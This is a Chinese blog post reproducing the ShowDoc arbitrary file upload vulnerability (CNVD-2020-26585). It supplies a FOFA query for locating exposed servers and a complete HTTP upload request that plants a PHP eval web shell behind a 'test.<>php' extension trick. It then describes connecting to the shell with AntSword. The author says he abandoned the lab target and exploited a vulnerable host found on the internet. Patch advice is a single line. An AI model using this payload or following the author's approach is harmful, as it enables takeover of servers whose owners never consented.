ShowDoc文件上传(CNVD-2020-26585)

最新推荐文章于 2024-03-20 10:03:30 发布
最新推荐文章于 2024-03-20 10:03:30 发布
阅读量3.6k 收藏 6
点赞数 1
分类专栏: 渗透 复现 文章标签: 信息安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34341458/article/details/123889259
版权

0x01 描述

描述: showdoc一个非常适合IT团队的API文档、技术文档工具。在前台存在文件上传,可以getshell。

0x02 影响范围

fofa搜索语句:

app=“ShowDoc”

先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg //文件上传漏洞的链接。如果出现“没有出现上传的文件”,说明可能存在漏洞并可以尝试利用。

在这里插入图片描述

0x03 漏洞复现

漏洞地址:http://vulfocus.io/#/dashboard?image_id=88402f6d-13a9-493f-ac0e-080004965fcf
在这里插入图片描述

  1. 访问靶场,靶机开启速度较慢。访问:http://ip:prot/index.php?s=/home/page/uploadImg ,没有出现"没有上传的文件",心里一凉,果不其然,没有复现成功。于是在佛法上一通搞,找到了个有洞的,于是继续搞。
    在这里插入图片描述
  2. 构造请求包,POC如下:
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo 'hello!!!';@eval($_POST['aw'])?>
----------------------------921378126371623762173617--

在这里插入图片描述
文件上传成功,文件url也进行了返回,复制链接打开蚁剑,将所有的“\”去除。
在这里插入图片描述
成功!
在这里插入图片描述

0x04

万能修复建议:升级最新版本!

参考:https://www.freebuf.com/vuls/306461.html

Redamancy——
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ShowDoc后台文件上传漏洞分析 CNVD-2020-49480(CVE-2021-41745)
afei001
08-06 620
​ github获取ShowDoc源码,版本:ShowDoc v2.8.2,使用phpstudy本地搭建环境。环境搭建参考官网:ShowDoc
showdoc-master.zip
07-28
showdoc-master
gitblit提交代码自动将文件上传到showdoc进行文档管理
xiah2li的博客
04-16 316
应用场景:gitblit提交代码后,使用钩子脚本将文件上传到showdoc 一、 gitblit配置 在gitblit服务器,data>groovy目录下面,新增一个showdoc.groovy脚本文件。 测试的gitblit版本:1.9.2 在仓库编辑里,接收>post-receive脚本,将showdoc.groovy推至selected 二、showdoc部署 官方部署说明:https://www.showdoc.com.cn/help/4087044677189279 按官方部署成功
ShowDoc文件上传漏洞(CNVD-2020-26585
最新发布
m0_57900228的博客
03-20 621
1、先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg 如果出现“ 没有上传的文件!”,说明可能存在漏洞并可以尝试利用。ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。api_page存在任意文件上传。3、文件上传成功(上图),复制链接至蚁剑,将所有的“\”去除。声明:文章仅供安全研究与学习之用,请勿用于非法用途!2、打开页面直接抓包后改包。
2020-11-01
weixin_52121668的博客
11-01 69
windows快捷键 关闭窗口 Alt+F4 复制 Ctrl+c 粘贴 Ctrl+v 剪贴 Ctrl+x 全选 Ctrl+A 撤销 Ctrl+z 保存 Ctrl+s 任务管理器 Ctrl+shift+Esc Ctrl+Alt+del Ctrl+Alt+Delete Windows 平铺界面 Windows+Tab 运行 Windows+R 我的计算机 Windows+E 切换界面 Alt+Tab Dos命令 盘符切换 C: D: 查看当前目录 Dir 目录切换 只能当前盘内的切换cd空格 盘内盘外都可c
ShowDoc漏洞学习——CNVD-2020-26585(任意文件上传
记录并分享学习安全的知识点..
07-24 1073
​ ShowDoc一个非常适合IT团队的API文档、技术文档工具。2.8.3以下版本的ShowDoc 存在任意文件上传漏洞,攻击者通过构造特殊的数据包可以上传恶意文件控制服务器。
【漏洞复现-showdoc-文件上传】​vulfocus/showdoc-cnvd_2020_26585
10-10 1858
【showdoc-文件上传】API_page存在任意文件上传
showdoc 文件上传CNVD-2020-26585)漏洞复现
weixin_42675091的博客
09-03 1780
showdoc 文件上传CNVD-2020-26585)漏洞复现
showdoc 文件上传cnvd-2020-26585
weixin_51559599的博客
10-27 254
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。api_page存在任意文件上传.
ShowDoc任意文件上传绕过手法分享
众生度尽,方证菩提
07-16 744
因为你仍能痛苦,所以说明你对生活还抱有希望!
ShowDoc文件上传(CNVD-2020-26585)
m0_65150886的博客
01-18 416
通过Showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。ShowDoc 2.8.3以下版本中存在安全漏洞,ShowDoc存在文件上传漏洞,攻击者可以利用漏洞获取服务器权限。1.访问http://ip:port,出现如下页面,开始实验。ShowDoc是一个非常适合IT团队的在线API文档、2.burp抓取该页面包,并修改get请求。
swagger-showdoc:一个将swagger的Json文件转换为ShowDoc的小工具
05-01
本项目旨在帮助使用swagger项目的团队,利用现有的swagger.json格式文件来实现文档的自动生成,文档的展示使用了showDoc 软件架构 Spring Boot 2.0.3 JDK 1.8 swagger2markup 1.3.3 okhttp 3.11.0 使用说明 克隆项目...
docker部署showdoc
12-10
docker部署showdoc
showdoc本地搭建文件.rar
09-30
内容包括: 1、PHP运行环境(WAMP)wamp-server-wamp5-2-5-multi-win.zip 2、vcredist_x86(环境文件) 3、showdoc部署代码 以上资源仅为学习使用,如有问题欢迎联系进行修改
showdoc-master
11-09
showdoc用以接口文档管理,方便开发人员在开发过程中记录接口信息,测试人员测试及文档最终归档
Zeppelin未授权访问getshell
qq_34341458的博客
04-01 4188
0x01 漏洞简介 Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。 Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等 0x02 影响范围 fofa语句:title=“Zeppelin” 需
aspx+mssql网站注入实战
qq_34341458的博客
02-02 1765
aspx网站注入实战 使用谷歌语法:site:. tw inurl:Login.aspx 查找网站 (site是代表国家的代码) 找到网页使用语句测试是否有注入 可能存在注入,使用burpsuit抓登录时的包。 将数据拷贝保存到d:/a.txt内。 使用sqlmap跑包。 sqlmap.py -r d:/a.txt 发现注入 sqlmap.py -r d:/a.txt --dbs 跑数据库 sqlmap.py -r d:/a.txt -D master --tables 跑表 sqlmap
永恒之蓝(MS17010)漏洞复现
qq_34341458的博客
05-07 1719
文章目录介绍:准备开始复现正式开始利用 介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序 准备 1.kali的ip:192.168.0.128 2.WindowsServer
Linux服务器 部署showdoc
06-14
好的,您可以按照以下步骤来部署 ShowDoc 在 Linux 服务器上: 1. 安装 LAMP 环境:在 Linux 服务器上安装 Apache、MySQL 和 PHP 环境。 2. 下载 ShowDoc:在 ShowDoc 的官网上下载最新的压缩包。 3. 解压 ShowDoc:将下载的压缩包解压到 Apache 的 Web 目录下。 4. 配置数据库:创建一个 MySQL 数据库,并将 ShowDoc 的配置文件中的数据库配置信息修改为对应的值。 5. 创建管理员账号:运行 ShowDoc 提供的脚本来创建一个管理员账号,以便后续的管理工作。 6. 配置 Apache:在 Apache 的配置文件中添加一个虚拟主机,将 ShowDoc 的根目录指定为虚拟主机的 DocumentRoot。 7. 重启 Apache:重启 Apache 服务以使新的配置生效。 8. 访问 ShowDoc:在浏览器中输入虚拟主机的地址,就可以访问 ShowDoc 了。 希望以上步骤能够帮到您。如果您在部署过程中遇到任何问题,可以随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值